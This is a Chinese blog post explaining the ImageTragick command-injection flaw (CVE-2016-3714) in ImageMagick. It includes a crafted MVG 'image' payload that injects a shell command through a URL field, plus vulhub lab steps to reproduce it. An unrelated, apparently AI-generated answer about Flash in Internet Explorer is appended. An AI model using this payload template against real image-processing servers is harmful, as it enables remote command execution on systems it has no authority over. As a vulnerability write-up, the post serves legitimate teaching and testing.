看图片也能中招!

本文讨论了近期QQ被盗号事件中的传言,聚焦于一张图片可能导致的安全问题,回顾了ImageMagick的高危命令注入漏洞,解释了如何通过恶意图片执行命令。同时,作者提供了漏洞原理、复现步骤以及历史案例的背景信息。

这两天,关于QQ盗号的安全事件相信大家已经听说了。各种各样的传言都有,一会儿数据库泄露了,一会儿API漏洞了,一会儿又是协议漏洞了,还有的说扫描二维码中招的,一时间众说纷纭。

在众多说法中,我看到了一个:只要点击图片就会中招!

好家伙,点图片就能中招,这可厉害了,要是对方发来一些诱惑的图片,年轻人把持不住那可咋整?

真有那么悬乎吗?

这不禁让我想起了几年前的一个漏洞,也是图片相关的,分享给大家看看。

那次漏洞的主角,是ImageMagick。

漏洞介绍

漏洞名称:Imagemagick 命令注入漏洞(CVE-2016-3714)

漏洞定级:高危

漏洞描述:ImageMagick 在处理恶意构造的图片文件时,对于文件中的 URL 未经严格过滤,可导致命令注入漏洞。通过命令注入漏洞,黑客可以在服务器上执行任意系统命令,获取服务器权限。

影响范围:ImageMagick 6.9.3-9本身及以前所有版本

漏洞原理

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。

但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。

国外的安全人员为此新建了一个网站:https://imagetragick.com/

与这个漏洞相关的CVE有CVE-2016-3714CVE-2016-3715CVE-2016-3716CVE-2016-3717

其中最严重的就是CVE-2016-3714,利用这个漏洞可以造成远程命令执行的危害。

ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的

参考代码:https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

我们在ImageMagick的默认配置文件里可以看到所有的委托:/etc/ImageMagick/delegates.xml 漏洞报告中给出的POC是利用了如下的这个委托:

<delegate decode="https" command="&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;"/>

它在解析https图片的时候,使用了curl命令将其下载,我们看到%M被直接放在curl的最后一个参数内。

ImageMagick默认支持一种图片格式,叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。

所以我们可以构造一个.mvg格式的图片(但文件名可以不为.mvg,比如下图中包含payload的文件的文件名为vul.gif,而ImageMagick会根据其内容识别为mvg图片),并在https://后面闭合双引号,写入自己要执行的命令:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://"|id; ")’
pop graphic-context

这样,ImageMagick在正常执行图片转换、处理的时候就会触发漏洞。

漏洞复现

  • 搭建靶机,教程:https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

  • 下载vulhub:git clone https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

  • 进入目录:cd /vulhub-master/imagemagick/imagetragick

  • 启动docker:docker-compose up -d 注意 我靶机 docker-compose.yml中端口为8888

125b673404738820454f9fe807f97a32.png
  • 访问搭建的靶机ip:8888

fcb717b1137cd2cc1c217a937569d509.png
  • 上传poc,新建一个txt文件,内容为:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

将文件保存为poc.gif

46d2bc1b0bf7ed8eb87fcf74b5fd7f2b.png

上次poc.gif,点击提交,成功执行:

9064e09f5f0b5133e39bcab609638898.png

这年头,除了链接,图片也不敢随便乱点了···

————————————————

漏洞原理和复现部分原文链接:https://blog.youkuaiyun.com/u011975363/article/details/118031227

推荐阅读

回答参考qwen. 您遇到的问题是:**在使用 IE 浏览器查看图片时提示 Flash 更新,安装新版本 Flash 后图片反而显示为空白**。这个问题虽然看似“技术故障”,但实际上反映了现代 Web 技术演进中的一个关键事实 —— **Flash 已经被彻底淘汰,继续依赖它会导致功能失效甚至安全风险**。 下面我们从问题本质、原因分析、解决方案和未来建议四个方面进行详细解析。 --- ## 🧩 一、问题现象回顾 - **浏览器**:Internet Explorer(IE) - **操作**: 1. 打开网页想看图片; 2. 浏览器弹出“需要更新 Adobe Flash Player”; 3. 用户下载并安装新的 Flash 插件; 4. 刷新页面后,原本应显示的图片变成空白。 - **结果**:无法正常查看内容。 --- ## ⚠️ 二、核心真相:Flash 已死!不再支持! ### 🔴 Adobe 官方声明(自 2020 年起) > ❗ **Adobe 于 2020 年 12 月 31 日正式停止对 Flash Player 的所有支持**,包括: - 不再发布安全更新 - 不再允许分发 Flash 内容 - 所有主流浏览器(Chrome、Firefox、Edge、Safari)均已默认禁用或移除 Flash 👉 即使你“成功安装”了所谓的“新版 Flash”,那也极可能是: - 过期/伪造的第三方打包插件(可能含恶意软件) - 兼容性极差的老版本回滚 - 根本没有真正启用 --- ## 📊 三、为什么“装完 Flash 反而图片空白”? | 原因 | 说明 | |------|------| | ✅ 网站错误地将图像加载逻辑绑定到 Flash | 某些老旧系统(如教务平台、企业内网)曾用 Flash 渲染图片或相册,现已失效 | | ✅ IE 浏览器本身已不信任 Flash | Windows 系统自动通过更新禁用 Flash ActiveX 控件 | | ✅ 安全设置阻止未签名控件运行 | 新版 Flash 文件无有效数字签名,IE 直接拦截 | | ✅ Flash 插件与现代 JS/CSS 冲突 | 导致 DOM 渲染异常,出现“白屏” | | ✅ 图片实际由 JavaScript 动态加载,但被 Flash 初始化阻塞 | 如 `document.write` 被覆盖 | 📌 特别注意:**绝大多数现代网站早已不用 Flash 显示图片**。如果你看到这种提示,说明该网站严重过时! --- ## 🛠️ 四、解决方案(按优先级排序) ### ✅ 方法 1:不要用 IE!切换现代浏览器 > 💡 **根本解决之道:放弃 IE 和 Flash** | 推荐浏览器 | 优势 | |-----------|------| | **Microsoft Edge(Chromium 内核)** | 微软官方推荐替代 IE,兼容模式可打开旧站点 | | **Google Chrome** | 最广泛支持现代 Web 标准 | | **Mozilla Firefox** | 隐私友好,扩展丰富 | 🔧 操作建议: 1. 下载安装 [Microsoft Edge](https://www.microsoft.com/edge) 2. 打开目标网页测试是否能正常显示图片 3. 若仍需访问旧系统,可启用 Edge 的 **IE 模式**(仅用于兼容) > 📌 注意:Edge 中的 IE 模式也不会加载 Flash! --- ### ✅ 方法 2:检查是否真的需要用 Flash 显示图片? 大多数情况下,“提示 Flash 更新”是一个误导性 UI 设计: #### 场景举例: ```html <!-- 老旧代码片段 --> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"> <param name="movie" value="show_image.swf?img=photo.jpg" /> <!-- 实际上只是用 SWF 包装了一个 img --> </object> ``` 👉 这种方式早已被淘汰。正确的做法是直接使用 `<img src="photo.jpg">` #### 解决方案: - 如果你是**开发者**:立即重构前端,替换为 HTML5 + JavaScript - 如果你是**用户**:尝试右键点击空白区域 → “检查元素” → 查看是否有 `.swf` 请求失败 --- ### ✅ 方法 3:启用 IE 的“兼容性视图”(临时应急) 适用于某些政府/银行类老系统: 1. 打开 IE 2. 按 F12 打开开发者工具 3. 设置文档模式为 **IE10 或 IE11** 4. 添加站点到“兼容性视图设置” 5. 刷新页面 ⚠️ 效果有限,且不能恢复 Flash 功能。 --- ### ✅ 方法 4:联系网站管理员升级系统 如果这是公司内部系统或学校网站,请反馈以下信息: > “当前系统依赖已废弃的 Adobe Flash 技术,存在重大安全隐患,建议尽快迁移到 HTML5 架构。” 提供替代方案示例: - 使用 `<canvas>` 或 `<svg>` 替代动画 - 使用 `<img>` + CSS 实现图片展示 - 使用现代框架(React/Vue)重构前端 --- ## 📈 五、技术对比表:Flash vs HTML5 | 特性 | Flash | HTML5(现代标准) | |------|-------|------------------| | 是否需要插件 | ✅ 是 | ❌ 否 | | 跨平台支持 | ⚠️ 仅限桌面 | ✅ 手机/平板/PC 全支持 | | 安全性 | ❌ 极低(高频漏洞) | ✅ 高 | | 性能 | ⚠️ 占用高 CPU | ✅ 硬件加速 | | SEO 友好性 | ❌ 差 | ✅ 好 | | 维护状态 | 🟥 已终止(2020) | 🟩 持续发展 | | 推荐指数 | ⭐ | ⭐⭐⭐⭐⭐ | --- ## 📝 六、注意事项(重要!) | 风险 | 说明 | |------|------| | 🛑 不要从非官方渠道下载 Flash | 几乎所有“Flash 安装包”都捆绑病毒、广告软件 | | 🛑 不要在公共电脑上尝试激活 Flash | 极易中招勒索软件 | | 🔄 不要用 IE 浏览现代网站 | 安全性差、渲染错误多、性能低下 | | ✅ 推荐使用 HTTPS + 静态资源直连 | 图片应通过 `<img src="https://...">` 直接加载 | --- ## 🧾 七、总结 | 问题 | 回答 | |------|------| | **为什么装完 Flash 图片变空白?** | Flash 已被全面禁用,即使安装也无法运行,且可能导致页面崩溃 | | **能否修复?** | 不能通过安装 Flash 修复;必须更换浏览器或升级网站架构 | | **最佳解决方案?** | 放弃 IE 和 Flash,改用 Edge / Chrome 浏览器 | | **作为开发者怎么办?** | 彻底移除 Flash 依赖,使用 HTML5/CSS3/JavaScript 重构 | --- ## 📘 延伸阅读 - [Adobe Flash EOL 官方公告](https://www.adobe.com/products/flashplayer/end-of-life.html) - [Microsoft 关于 IE 模式的文档](https://learn.microsoft.com/en-us/deployedge/edge-ie-mode) - [MDN: Using HTML5 instead of Flash](https://developer.mozilla.org/zh-CN/docs/Web/Guide/HTML/Using_HTML5_in_IE) ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值